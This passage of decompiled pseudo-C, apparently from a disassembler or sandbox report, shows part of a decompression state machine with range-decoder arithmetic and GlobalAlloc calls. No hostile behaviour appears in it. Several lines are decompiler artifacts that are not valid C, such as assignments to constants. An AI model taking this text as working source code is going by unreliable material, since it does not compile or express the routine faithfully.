                                                                                                                          							_t534 =  *(_t613 - 0x84);
                                                                                                                          							L140:
                                                                                                                          							 *(_t613 - 0x88) = _t534;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							L137:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 5;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							goto L139;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						if( *(__ebp - 0x60) == 0) {
                                                                                                                          							L171:
                                                                                                                          							_t536 = _t535 | 0xffffffff;
                                                                                                                          							L172:
                                                                                                                          							return _t536;
                                                                                                                          						}
                                                                                                                          						__eax = 0;
                                                                                                                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          						L75:
                                                                                                                          						if( *(__ebp - 0x64) == 0) {
                                                                                                                          							 *(__ebp - 0x88) = 0x1b;
                                                                                                                          							L170:
                                                                                                                          							_t568 = 0x22;
                                                                                                                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          							_t536 = 0;
                                                                                                                          							goto L172;
                                                                                                                          						}
                                                                                                                          						__eax =  *(__ebp - 0x14);
                                                                                                                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          						}
                                                                                                                          						__edx =  *(__ebp - 8);
                                                                                                                          						__cl =  *(__eax + __edx);
                                                                                                                          						__eax =  *(__ebp - 0x14);
                                                                                                                          						 *(__ebp - 0x5c) = __cl;
                                                                                                                          						 *(__eax + __edx) = __cl;
                                                                                                                          						__eax = __eax + 1;
                                                                                                                          						__edx = 0;
                                                                                                                          						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          						__edx = _t274;
                                                                                                                          						__eax =  *(__ebp - 0x68);
                                                                                                                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          						_t283 = __ebp - 0x64;
                                                                                                                          						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          						L79:
                                                                                                                          						 *(__ebp - 0x14) = __edx;
                                                                                                                          						L80:
                                                                                                                          						 *(__ebp - 0x88) = 2;
                                                                                                                          					}
                                                                                                                          					L1:
                                                                                                                          					_t535 =  *(_t613 - 0x88);
                                                                                                                          					if(_t535 > 0x1c) {
                                                                                                                          						goto L171;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                                                                          						case 0:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							_t535 =  *( *(_t613 - 0x70));
                                                                                                                          							if(_t535 > 0xe1) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							_t539 = _t535 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t570);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t571);
                                                                                                                          							_t609 = _t539 / _t570;
                                                                                                                          							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                          							 *(_t613 - 0x3c) = _t604;
                                                                                                                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          								L10:
                                                                                                                          								if(_t612 == 0) {
                                                                                                                          									L12:
                                                                                                                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									goto L11;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L11:
                                                                                                                          									_t612 = _t612 - 1;
                                                                                                                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          								} while (_t612 != 0);
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          							if( *(_t613 - 4) != 0) {
                                                                                                                          								GlobalFree( *(_t613 - 4));
                                                                                                                          							}
                                                                                                                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							 *(_t613 - 4) = _t535;
                                                                                                                          							if(_t535 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          								goto L10;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L13:
                                                                                                                          							__eflags =  *(_t613 - 0x6c);
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 1;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							_t45 = _t613 - 0x48;
                                                                                                                          							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          							__eflags =  *_t45;
                                                                                                                          							L15:
                                                                                                                          							if( *(_t613 - 0x48) < 4) {
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							_t547 =  *(_t613 - 0x40);
                                                                                                                          							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                          								L20:
                                                                                                                          								 *(_t613 - 0x48) = 5;
                                                                                                                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x74) = _t547;
                                                                                                                          							if( *(_t613 - 8) != 0) {
                                                                                                                          								GlobalFree( *(_t613 - 8));
                                                                                                                          							}
                                                                                                                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          							 *(_t613 - 8) = _t535;
                                                                                                                          							if(_t535 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L24:
                                                                                                                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          							 *(_t613 - 0x84) = 6;
                                                                                                                          							 *(_t613 - 0x4c) = _t554;
                                                                                                                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 3:
                                                                                                                          							L21:
                                                                                                                          							__eflags =  *(_t613 - 0x6c);
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 3;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							_t67 = _t613 - 0x70;
                                                                                                                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							__eflags =  *_t67;
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							L23:
                                                                                                                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          							if( *(_t613 - 0x48) != 0) {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          							goto L24;
                                                                                                                          						case 4:
                                                                                                                          							goto L133;
                                                                                                                          						case 5:
                                                                                                                          							goto L137;
                                                                                                                          						case 6:
                                                                                                                          							__edx = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x34) = 1;
                                                                                                                          								 *(__ebp - 0x84) = 7;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          							__esi =  *(__ebp - 0x60);
                                                                                                                          							__cl = 8;
                                                                                                                          							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          							__ecx =  *(__ebp - 0x3c);
                                                                                                                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          							__ecx =  *(__ebp - 4);
                                                                                                                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          							if( *(__ebp - 0x38) >= 4) {
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          									_t98 = __ebp - 0x38;
                                                                                                                          									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          									__eflags =  *_t98;
                                                                                                                          								} else {
                                                                                                                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x38) = 0;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          							if( *(__ebp - 0x34) == __edx) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								goto L61;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 8);
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          						case 7:
                                                                                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          							if( *(__ebp - 0x40) != 1) {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          								 *(__ebp - 0x80) = 0x16;
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x28);
                                                                                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *(__ebp - 0x58) = __eax;
                                                                                                                          								goto L69;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							__ecx =  *(__ebp - 0x38);
                                                                                                                          							 *(__ebp - 0x84) = 8;
                                                                                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 8:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xa;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                          								__ecx =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          								 *(__ebp - 0x84) = 9;
                                                                                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          							}
                                                                                                                          							goto L132;
                                                                                                                          						case 9:
                                                                                                                          							goto L0;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xb;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x28);
                                                                                                                          							goto L88;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x20);
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x28);
                                                                                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          							L88:
                                                                                                                          							__ecx =  *(__ebp - 0x2c);
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          							goto L89;
                                                                                                                          						case 0xc:
                                                                                                                          							L99:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xc;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t334 = __ebp - 0x70;
                                                                                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t334;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							__eax =  *(__ebp - 0x2c);
                                                                                                                          							goto L101;
                                                                                                                          						case 0xd:
                                                                                                                          							L37:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xd;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t122 = __ebp - 0x70;
                                                                                                                          							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t122;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L39:
                                                                                                                          							__eax =  *(__ebp - 0x40);
                                                                                                                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          								goto L48;
                                                                                                                          							}
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								goto L54;
                                                                                                                          							}
                                                                                                                          							L41:
                                                                                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          							 *(__ebp - 0x48) = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								 *(__ebp - 0x40) = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L39;
                                                                                                                          							} else {
                                                                                                                          								goto L37;
                                                                                                                          							}
                                                                                                                          						case 0xe:
                                                                                                                          							L46:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xe;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t156 = __ebp - 0x70;
                                                                                                                          							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t156;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							while(1) {
                                                                                                                          								L48:
                                                                                                                          								__eflags = __ebx - 0x100;
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								__edx = __ebx + __ebx;
                                                                                                                          								__ecx =  *(__ebp - 0x10);
                                                                                                                          								__esi = __edx + __eax;
                                                                                                                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          								__ax =  *__esi;
                                                                                                                          								 *(__ebp - 0x54) = __esi;
                                                                                                                          								__edi = __ax & 0x0000ffff;
                                                                                                                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          									__cx = __ax;
                                                                                                                          									_t170 = __edx + 1; // 0x1
                                                                                                                          									__ebx = _t170;
                                                                                                                          									__cx = __ax >> 5;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									 *__esi = __ax;
                                                                                                                          								} else {
                                                                                                                          									 *(__ebp - 0x10) = __ecx;
                                                                                                                          									0x800 = 0x800 - __edi;
                                                                                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          									__ebx = __ebx + __ebx;
                                                                                                                          									 *__esi = __cx;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L46;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L54:
                                                                                                                          							_t173 = __ebp - 0x34;
                                                                                                                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          							__eflags =  *_t173;
                                                                                                                          							goto L55;
                                                                                                                          						case 0xf:
                                                                                                                          							L58:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xf;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t203 = __ebp - 0x70;
                                                                                                                          							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t203;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L60:
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								L55:
                                                                                                                          								__al =  *(__ebp - 0x44);
                                                                                                                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							L61:
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx =  *(__ebp - 0x10);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t217 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t217;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								goto L58;
                                                                                                                          							}
                                                                                                                          						case 0x10:
                                                                                                                          							L109:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x10;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t365 = __ebp - 0x70;
                                                                                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t365;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x11:
                                                                                                                          							goto L69;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								 *(__ebp - 0x84) = 0x13;
                                                                                                                          								__esi =  *(__ebp - 0x58) + 2;
